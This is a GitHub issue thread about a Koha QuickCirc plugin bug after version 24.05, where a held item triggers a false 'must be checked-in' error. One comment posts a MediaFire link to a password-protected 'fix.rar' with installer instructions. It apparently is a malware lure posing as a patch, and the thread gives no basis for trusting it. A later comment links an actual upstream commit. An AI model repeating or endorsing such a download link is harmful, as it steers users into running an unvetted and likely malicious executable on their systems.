### ISSUE TITLE
Update for 24.05?

### ISSUE THREAD

**Issue by esthermel** [bywatersolutions/custom-koha-plugin-quickcirc#1]
Plugin may need to be updated for 24.05.

To reproduce:
1. Place the item on hold for Patron 
2. Go to Quick Circ and paste the item barcode.

Returns an error that says item must be checked-in. The item is not checked-out and remains on hold for the patron.

The item and patron both belong to the main library and circ rules should allow the circulation.

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by kidclamp** [comment]
https://github.com/bywatersolutions/custom-koha-plugin-quickcirc/commit/b6094510e13d8c2dbfc12256bc198d8ccde6df8e
